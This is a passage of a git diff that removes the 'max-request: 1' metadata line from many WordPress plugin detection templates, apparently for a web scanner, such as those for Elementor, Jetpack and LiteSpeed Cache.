     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..1e6a62e23b 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 9c6e3e6d2e..1778552d75 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
